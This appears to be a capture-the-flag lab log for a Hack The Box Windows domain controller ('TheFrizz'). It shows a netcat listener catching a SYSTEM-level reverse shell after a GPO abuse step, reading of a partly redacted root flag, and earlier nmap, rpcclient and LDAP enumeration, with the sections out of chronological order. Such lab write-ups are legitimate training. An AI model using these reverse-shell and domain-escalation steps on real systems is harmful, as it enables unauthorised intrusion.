gpupdate
GPO-ABUSE:
sudo rlwrap nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.10.14.74] from (UNKNOWN) [10.129.154.9] 53519
whoami
nt authority\system
PS C:\Windows\system32> hostname
frizzdc
PS C:\Windows\system32>
SYSTEM-SHELL !
PS C:\Users\Administrator\Desktop> whoami
nt authority\system
PS C:\Users\Administrator\Desktop> hostname
frizzdc
PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/25/2025 2:06 PM 2083 cleanup.ps1
-ar--- 3/27/2025 2:40 PM 34 root.txt
PS C:\Users\Administrator\Desktop> type root.txt
d158ce00918[REDIRECTED]
ROOT.TXT: d158ce00918[REDIRECTED]
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-24 21:06:05Z)
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ]
└─# rpcclient --user="" --command=enumdomusers -N 10.129.99.125
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ]
└─# rpcclient --user="" --command=srvinfo -N 10.129.99.125
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
┌──(root㉿kali)-[/home/kali/BOXES/THEFRIZZ]
└─# rpcclient --user="" --command=getdompwinfo -N 10.129.99.125
Cannot connect to server. Error was NT_STATUS_NOT_SUPPORTED
#NO PrintNightmare = DON'T BOTHER !
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
ldapsearch -H ldap://10.129.99.125 -x -W -D "" -b "dc=frizz,dc=htb" '(objectClass=person)'
Enter LDAP Password:
# extended LDIF
#
# LDAPv3
# base <dc=frizz,dc=htb> with scope subtree
# filter: (objectClass=person)
# requesting: ALL
#
# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090CB6, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c
# numResponses: 1
#NOPE, needs an authenticated user, don't bother !
445/tcp open microsoft-ds?
-No anonymous access either; NTLM authentication is probably disabled and Kerberos required instead.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: frizz.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Hosts: localhost, FRIZZDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-24T21:06:10
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
|_clock-skew: 6h08m47s